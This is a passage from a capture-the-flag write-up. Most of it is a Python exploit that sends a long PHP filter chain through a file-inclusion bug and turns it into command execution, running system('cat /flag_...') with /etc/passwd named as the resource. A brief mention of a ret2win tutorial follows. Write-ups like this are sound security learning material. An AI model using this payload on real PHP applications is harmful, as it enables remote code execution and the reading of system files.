tmp = {"👀" : "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.ISO-IR-156.8859_9|convert.iconv.CSISOLATINGREEK.MSCP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.iconv.CSISO99NAPLPS.CP902|convert.iconv.ISO-IR-143.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.PT154.874|convert.iconv.CSISO2022KR.UTF-32|convert.iconv.CSIBM901.ISO_6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO2022KR.UTF16|convert.iconv.LATIN6.CSUCS4|convert.iconv.UTF-32BE.ISO_6937-2:1983|convert.iconv.ISO-IR-111.CSWINDOWS31J|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSA_T500.EUCJP-WIN|convert.iconv.CP855.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.UCS-4BE|convert.iconv.OSF00010004.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.ISO-10646/UTF-8|convert.iconv.BALTIC.SHIFT_JISX0213|convert.iconv.CP949.CP1361|convert.iconv.CSISOLATIN2.T.61|convert.iconv.IBM932.BIG-5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-"
             "encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.NAPLPS.UCS-4|convert.iconv.ISO_8859-4.T.618BIT|convert.iconv.CSISO103T618BIT.BIG5-HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.BIGFIVE.CSIBM943|convert.iconv.LATIN6.WINDOWS-1258|convert.iconv.CP1258.CSISO103T618BIT|convert.iconv.NAPLPS.OSF10020359|convert.iconv.WINDOWS-1256.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-GR.UNICODE|convert.iconv.ISO_8859-14:1998.UTF32BE|convert.iconv.OSF00010009.ISO2022JP2|convert.iconv.UTF16.ISO-10646/UTF-8|convert.iconv.UTF-16.UTF8|convert.iconv.ISO_8859-14:1998.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.BIGFIVE.CSIBM943|convert.iconv.LATIN6.WINDOWS-1258|convert.iconv.CP1258.CSISO103T618BIT|convert.iconv.NAPLPS.OSF10020359|convert.iconv.WINDOWS-1256.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-103.CSEUCPKDFMTJAPANESE|convert.iconv.OSF00010002.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.CSEUCKR.UTF-32|convert.base64-decode|conver"
             "t.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.UCS-4BE|convert.iconv.OSF00010004.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UCS-4BE.855|convert.iconv.ISO88599.CSISO90|convert.iconv.ISO_6937:1992.10646-1:1993|convert.iconv.CP773.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UK.852|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.iconv.ISO6937.UCS-2LE|convert.iconv.CP864.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.ISO-IR-156.8859_9|convert.iconv.CSISOLATINGREEK.MSCP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.iconv.CSIBM932.IBM866NAV|convert.iconv.IBM775.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|conve"
             "rt.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.iconv.CSIBM932.IBM866NAV|convert.iconv.IBM775.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UCS-4BE.855|convert.iconv.ISO88599.CSISO90|convert.iconv.ISO_6937:1992.10646-1:1993|convert.iconv.CP773.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.OSF00010104|convert.iconv.CP860.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UTF-32BE.MS936|convert.iconv.8859_5.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-GR.UNICODE|convert.iconv.ISO_8859-14:1998.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-90.UTF16LE|convert.iconv.IBM874.UNICODEBIG|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-103.ISO-IR-209|convert.iconv.8859_5.CSISO2022JP2|convert.iconv.ISO-2022-JP-3.IBM-943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO2022KR.UTF16|convert.iconv.LATIN6.CSUCS4|convert.iconv.UTF-32BE.ISO_6937-2:1983|convert.iconv.ISO-IR-111.CSWINDOW"
             "S31J|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"}
x = requests.post(url, data = tmp, params={"1":"system(\"cat /flag_cr14x5hc\");"})
print(x.text)
```
And that's it.
## Pwn
### [Tutorial] ret2win
I just followed the provided tutorial, so I won't write it up.